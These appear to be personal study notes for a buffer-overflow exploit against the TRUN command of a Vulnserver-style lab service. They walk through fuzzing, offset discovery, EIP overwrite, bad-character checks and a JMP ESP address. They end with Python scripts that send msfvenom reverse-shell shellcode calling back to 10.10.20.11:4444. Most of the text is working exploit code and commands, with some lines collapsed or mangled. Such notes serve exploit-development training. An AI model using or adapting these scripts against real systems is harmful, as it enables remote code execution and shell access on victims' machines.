https://www.youtube.com/watch?v=GqwyonqLYdQ
Spiking
*generic_send_tcp 10.10.20.13 9999 trun.spk 0 0
trun.spk s_readline(); s_string("TRUN "); s_string_variable("0");
Fuzzing
fuzz.py #!/usr/bin/python import sys, socket from time import sleep
buffer = "A" * 100
while True: try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + buffer))`
`s.close()`
`sleep(1)`
`buffer = buffer + "A"*100`
`except:`
`print "Fuzzing crashed at %s bytes" % str(len(buffer))`
`sys.exit()`
*Collect break point
Find offset
*/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 6000
offset.py
#!/usr/bin/python import sys, socket
offset = "pattern_create_output"
try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + offset))`
`s.close()`
except: print "Error connecting to server" sys.exit()
- Collect EIP value Immunity Debug
Find Offset
- /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 6000 -q EIP-Value
Overwrite EIP
eipwrite.py
#!/usr/bin/python import sys, socket
shellcode = "A" * 2003 + "B" * 4 (2003 = pattern_offset value)
try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + shellcode))`
`s.close()`
except: print "Error connecting to server" sys.exit()
- Check Immunity that EIP is all 424242
Check bad characters
- run badchars.py
- In Immunity follow in dump ESP
- Check that after 42424242 no bad characters are found
- 01 to FF should follow-up and not include B0 or other characters
- if not write down all badchars locations
Find right module
Check for memory protection
- Open Immunity
- run !mona modules
- look for dll with all set to false
- run !mona find -s “\xff\xe4” -m essfunc.dll (check for jumps)
- copy RETURN ADDR 625011AF
Check EIP overwrite with JMP info
- open Immunity open black error and fill in JMP address 625011af
- set breakpoint on window
*run writemodule.py
#!/usr/bin/python import sys, socket
# 625011af
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + shellcode))`
`s.close()`
except: print "Error connecting to server" sys.exit()
- go back to immunity check EIP shows JMP address and link to dll (essfunc.625011af) in example
Generate shellcode
- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.11 LPORT=4444 EXITFUNC=thread -f c -a x86 -b “\x00”
- copy outcome into overflow.py
#!/usr/bin/python import sys, socket
overflow = ( "\xba\xb9\x52\x1f\x1a\xd9\xc2\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x12\x03\x50\x12\x83\x79\x56\xfd\xef\x85\xbf\x83" "\x10\x75\x40\xe4\x99\x90\x71\x24\xfd\xd1\x22\x94\x75\xb7\xce" "\x5f\xdb\x23\x44\x2d\xf4\x44\xed\x98\x22\x6b\xee\xb1\x17\xea" "\x6c\xc8\x4b\xcc\x4d\x03\x9e\x0d\x89\x7e\x53\x5f\x42\xf4\xc6" "\x4f\xe7\x40\xdb\xe4\xbb\x45\x5b\x19\x0b\x67\x4a\x8c\x07\x3e" "\x4c\x2f\xcb\x4a\xc5\x37\x08\x76\x9f\xcc\xfa\x0c\x1e\x04\x33" "\xec\x8d\x69\xfb\x1f\xcf\xae\x3c\xc0\xba\xc6\x3e\x7d\xbd\x1d" "\x3c\x59\x48\x85\xe6\x2a\xea\x61\x16\xfe\x6d\xe2\x14\x4b\xf9" "\xac\x38\x4a\x2e\xc7\x45\xc7\xd1\x07\xcc\x93\xf5\x83\x94\x40" "\x97\x92\x70\x26\xa8\xc4\xda\x97\x0c\x8f\xf7\xcc\x3c\xd2\x9f" "\x21\x0d\xec\x5f\x2e\x06\x9f\x6d\xf1\xbc\x37\xde\x7a\x1b\xc0" "\x21\x51\xdb\x5e\xdc\x5a\x1c\x77\x1b\x0e\x4c\xef\x8a\x2f\x07" "\xef\x33\xfa\x88\xbf\x9b\x55\x69\x6f\x5c\x06\x01\x65\x53\x79" "\x31\x86\xb9\x12\xd8\x7d\x2a\x17\x17\x69\xa1\x4f\x25\x91\xa4" "\xd3\xa0\x77\xac\xfb\xe4\x20\x59\x65\xad\xba\xf8\x6a\x7b\xc7" "\x3b\xe0\x88\x38\xf5\x01\xe4\x2a\x62\xe2\xb3\x10\x25\xfd\x69" "\x3c\xa9\x6c\xf6\xbc\xa4\x8c\xa1\xeb\xe1\x63\xb8\x79\x1c\xdd" "\x12\x9f\xdd\xbb\x5d\x1b\x3a\x78\x63\xa2\xcf\xc4\x47\xb4\x09" "\xc4\xc3\xe0\xc5\x93\x9d\x5e\xa0\x4d\x6c\x08\x7a\x21\x26\xdc" "\xfb\x09\xf9\x9a\x03\x44\x8f\x42\xb5\x31\xd6\x7d\x7a\xd6\xde" "\x06\x66\x46\x20\xdd\x22\x66\xc3\xf7\x5e\x0f\x5a\x92\xe2\x52" "\x5d\x49\x20\x6b\xde\x7b\xd9\x88\xfe\x0e\xdc\xd5\xb8\xe3\xac" "\x46\x2d\x03\x02\x66\x64")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + shellcode))`
`s.close()`
RootSecurity 